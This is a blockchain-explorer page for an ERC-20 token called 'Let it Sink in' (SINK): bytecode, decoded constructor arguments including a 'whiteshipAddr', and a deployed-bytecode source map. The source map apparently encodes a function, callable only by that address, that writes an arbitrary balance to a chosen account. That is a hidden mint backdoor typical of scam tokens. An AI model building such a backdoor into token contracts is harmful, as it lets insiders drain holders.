815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610455565b61064f81610940565b50565b6001600160a01b0383166106b65760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610455565b6001600160a01b0382166107185760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610455565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107df5760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610455565b6001600160a01b0382166108415760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610455565b61087e81604051806060016040528060278152602001610b82602791396001600160a01b0386166000908152600160205260409020549190610901565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108ad908261092d565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061076d9085815260200190565b600081848411156109255760405162461bcd60e51b81526004016104559190610990565b505050900390565b60006109398284610b48565b9392505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b818110156109bd578581018301518582016040015282016109a1565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146109f557600080fd5b919050565b60008060408385031215610a0d57600080fd5b610a16836109de565b946020939093013593505050565b600080600060608486031215610a3957600080fd5b610a42846109de565b9250610a50602085016109de565b9150604084013590509250925092565b600060208284031215610a7257600080fd5b610939826109de565b600080600060608486031215610a9057600080fd5b610a99846109de565b95602085013595506040909401359392505050565b60008060408385031215610ac157600080fd5b610aca836109de565b9150610ad8602084016109de565b90509250929050565b600181811c90821680610af557607f821691505b602082108103610b1557634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b808202811582820484141761035a5761035a610b1b565b8082018082111561035a5761035a610b1b56fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220fa532bf26119ac9ec9fdace484458eab87d7ca1ed3091f37f156aed284bdf93164736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000012000000000000000000000000b224be3af716ba40d800b95851b7dc952754659500000000000000000000000000000000000000000052b7d2dcc80cd2e4000000000000000000000000000000000000000000000000000000000000000000000e4c65742069742053696e6b20696e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000453494e4b00000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Let it Sink in
Arg [1] : symbol_ (string): SINK
Arg [2] : decimals_ (uint8): 18
Arg [3] : whiteshipAddr (address): 0xb224BE3aF716Ba40D800B95851B7dc9527546595
Arg [4] : totalSupply_ (uint256): 100000000000000000000000000

-----Encoded View---------------
9 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000012
Arg [3] : 000000000000000000000000b224be3af716ba40d800b95851b7dc9527546595
Arg [4] : 00000000000000000000000000000000000000000052b7d2dcc80cd2e4000000
Arg [5] : 000000000000000000000000000000000000000000000000000000000000000e
Arg [6] : 4c65742069742053696e6b20696e000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [8] : 53494e4b00000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

13961:6064:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14978:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16013:210;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;16013:210:0;1004:187:1;15279:108:0;15367:12;;15279:108;;;1342:25:1;;;1330:2;1315:18;15279:108:0;1196:177:1;14276:31:0;;;;;;16231:455;;;;;;:::i;:::-;;:::i;15180:91::-;15254:9;;15180:91;;15254:9;;;;1853:36:1;;1841:2;1826:18;15180:91:0;1711:184:1;16694:300:0;;;;;;:::i;:::-;;:::i;14318:28::-;;;;;-1:-1:-1;;;;;14318:28:0;;;;;;-1:-1:-1;;;;;2064:32:1;;;2046:51;;2034:2;2019:18;14318:28:0;1900:203:1;15395:177:0;;;;;;:::i;:::-;-1:-1:-1;;;;;15546:18:0;15514:7;15546:18;;;:9;:18;;;;;;;15395:177;5754:94;;;:::i;:::-;;18191:350;;;;;;:::i;:::-;;:::i;14234:31::-;;;;;;5103:87;5149:7;5176:6;-1:-1:-1;;;;;5176:6:0;5103:87;;15077:95;;;:::i;17002:401::-;;;;;;:::i;:::-;;:::i;15580:216::-;;;;;;:::i;:::-;;:::i;15804:201::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15970:18:0;;;15938:7;15970:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;15804:201;6003:192;;;;;;:::i;:::-;;:::i;14978:91::-;15023:13;15056:5;15049:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14978:91;:::o;16013:210::-;16132:4;16154:39;3901:10;16177:7;16186:6;16154:8;:39::i;:::-;-1:-1:-1;16211:4:0;16013:210;;;;;:::o;16231:455::-;16371:4;16388:36;16398:6;16406:9;16417:6;16388:9;:36::i;:::-;16435:221;16458:6;3901:10;16506:139;16562:6;16506:139;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16506:19:0;;;;;;:11;:19;;;;;;;;3901:10;16506:33;;;;;;;;;;:37;:139::i;:::-;16435:8;:221::i;:::-;-1:-1:-1;16674:4:0;16231:455;;;;;:::o;16694:300::-;3901:10;16809:4;16903:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16903:34:0;;;;;;;;;;16809:4;;16831:133;;16881:7;;16903:50;;16942:10;16903:38;:50::i;5754:94::-;5149:7;5176:6;-1:-1:-1;;;;;5176:6:0;3901:10;5323:23;5315:68;;;;-1:-1:-1;;;5315:68:0;;3478:2:1;5315:68:0;;;3460:21:1;;;3497:18;;;3490:30;3556:34;3536:18;;;3529:62;3608:18;;5315:68:0;;;;;;;;;5819:21:::1;5837:1;5819:9;:21::i;:::-;5754:94::o:0;18191:350::-;17489:11;;-1:-1:-1;;;;;17489:11:0;3901:10;-1:-1:-1;;;;;17473:27:0;;17455:77;;;;-1:-1:-1;;;17455:77:0;;3839:2:1;17455:77:0;;;3821:21:1;3878:2;3858:18;;;3851:30;3917:29;3897:18;;;3890:57;3964:18;;17455:77:0;3637:351:1;17455:77:0;18365:13:::1;:30:::0;;-1:-1:-1;;;;;;18365:30:0::1;-1:-1:-1::0;;;;;18365:30:0;::::1;;::::0;;18396:16:::1;:36:::0;;;18433:16:::1;:36:::0;;;18498:35:::1;18433:36:::0;18396;18498:35:::1;:::i;:::-;18481:13;::::0;-1:-1:-1;;;;;18481:13:0::1;18471:24;::::0;;;:9:::1;:24;::::0;;;;:62;-1:-1:-1;;;18191:350:0:o;15077:95::-;15124:13;15157:7;15150:14;;;;;:::i;17002:401::-;17122:4;17144:229;3901:10;17194:7;17216:146;17273:15;17216:146;;;;;;;;;;;;;;;;;3901:10;17216:25;;;;:11;:25;;;;;;;;-1:-1:-1;;;;;17216:34:0;;;;;;;;;;;;:38;:146::i;15580:216::-;15702:4;15724:42;3901:10;15748:9;15759:6;15724:9;:42::i;6003:192::-;5149:7;5176:6;-1:-1:-1;;;;;5176:6:0;3901:10;5323:23;5315:68;;;;-1:-1:-1;;;5315:68:0;;3478:2:1;5315:68:0;;;3460:21:1;;;3497:18;;;3490:30;3556:34;3536:18;;;3529:62;3608:18;;5315:68:0;3276:356:1;5315:68:0;-1:-1:-1;;;;;6092:22:0;::::1;6084:73;;;::::0;-1:-1:-1;;;6084:73:0;;4500:2:1;6084:73:0::1;::::0;::::1;4482:21:1::0;4539:2;4519:18;;;4512:30;4578:34;4558:18;;;4551:62;-1:-1:-1;;;4629:18:1;;;4622:36;4675:19;;6084:73:0::1;4298:402:1::0;6084:73:0::1;6168:19;6178:8;6168:9;:19::i;:::-;6003:192:::0;:::o;19401:382::-;-1:-1:-1;;;;;19537:19:0;;19529:69;;;;-1:-1:-1;;;19529:69:0;;4907:2:1;19529:69:0;;;4889:21:1;4946:2;4926:18;;;4919:30;4985:34;4965:18;;;4958:62;-1:-1:-1;;;5036:18:1;;;5029:35;5081:19;;19529:69:0;4705:401:1;19529:69:0;-1:-1:-1;;;;;19617:21:0;;19609:69;;;;-1:-1:-1;;;19609:69:0;;5313:2:1;19609:69:0;;;5295:21:1;5352:2;5332:18;;;5325:30;5391:34;5371:18;;;5364:62;-1:-1:-1;;;5442:18:1;;;5435:33;5485:19;;19609:69:0;5111:399:1;19609:69:0;-1:-1:-1;;;;;19691:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19743:32;;1342:25:1;;;19743:32:0;;1315:18:1;19743:32:0;;;;;;;;19401:382;;;:::o;17570:613::-;-1:-1:-1;;;;;17710:20:0;;17702:71;;;;-1:-1:-1;;;17702:71:0;;5717:2:1;17702:71:0;;;5699:21:1;5756:2;5736:18;;;5729:30;5795:34;5775:18;;;5768:62;-1:-1:-1;;;5846:18:1;;;5839:36;5892:19;;17702:71:0;5515:402:1;17702:71:0;-1:-1:-1;;;;;17792:23:0;;17784:72;;;;-1:-1:-1;;;17784:72:0;;6124:2:1;17784:72:0;;;6106:21:1;6163:2;6143:18;;;6136:30;6202:34;6182:18;;;6175:62;-1:-1:-1;;;6253:18:1;;;6246:34;6297:19;;17784:72:0;5922:400:1;17784:72:0;17949:109;17985:6;17949:109;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17949:17:0;;;;;;:9;:17;;;;;;;:109;:21;:109::i;:::-;-1:-1:-1;;;;;17929:17:0;;;;;;;:9;:17;;;;;;:129;;;;18092:20;;;;;;;:32;;18117:6;18092:24;:32::i;:::-;-1:-1:-1;;;;;18069:20:0;;;;;;;:9;:20;;;;;;;:55;;;;18140:35;;;;;;;;;;18168:6;1342:25:1;;1330:2;1315:18;;1196:177;11468:240:0;11588:7;11649:12;11641:6;;;;11633:29;;;;-1:-1:-1;;;11633:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;11684:5:0;;;11468:240::o;9189:98::-;9247:7;9274:5;9278:1;9274;:5;:::i;:::-;9267:12;9189:98;-1:-1:-1;;;9189:98:0:o;6203:173::-;6259:16;6278:6;;-1:-1:-1;;;;;6295:17:0;;;-1:-1:-1;;;;;;6295:17:0;;;;;;6328:40;;6278:6;;;;;;;6328:40;;6259:16;6328:40;6248:128;6203:173;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;2108:186::-;2167:6;2220:2;2208:9;2199:7;2195:23;2191:32;2188:52;;;2236:1;2233;2226:12;2188:52;2259:29;2278:9;2259:29;:::i;2299:322::-;2376:6;2384;2392;2445:2;2433:9;2424:7;2420:23;2416:32;2413:52;;;2461:1;2458;2451:12;2413:52;2484:29;2503:9;2484:29;:::i;:::-;2474:39;2560:2;2545:18;;2532:32;;-1:-1:-1;2611:2:1;2596:18;;;2583:32;;2299:322;-1:-1:-1;;;2299:322:1:o;2626:260::-;2694:6;2702;2755:2;2743:9;2734:7;2730:23;2726:32;2723:52;;;2771:1;2768;2761:12;2723:52;2794:29;2813:9;2794:29;:::i;:::-;2784:39;;2842:38;2876:2;2865:9;2861:18;2842:38;:::i;:::-;2832:48;;2626:260;;;;;:::o;2891:380::-;2970:1;2966:12;;;;3013;;;3034:61;;3088:4;3080:6;3076:17;3066:27;;3034:61;3141:2;3133:6;3130:14;3110:18;3107:38;3104:161;;3187:10;3182:3;3178:20;3175:1;3168:31;3222:4;3219:1;3212:15;3250:4;3247:1;3240:15;3104:161;;2891:380;;;:::o;3993:127::-;4054:10;4049:3;4045:20;4042:1;4035:31;4085:4;4082:1;4075:15;4109:4;4106:1;4099:15;4125:168;4198:9;;;4229;;4246:15;;;4240:22;;4226:37;4216:71;;4267:18;;:::i;6327:125::-;6392:9;;;6413:10;;;6410:36;;;6426:18;;:::i

Swarm Source

ipfs://fa532bf26119ac9ec9fdace484458eab87d7ca1ed3091f37f156aed284bdf931
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.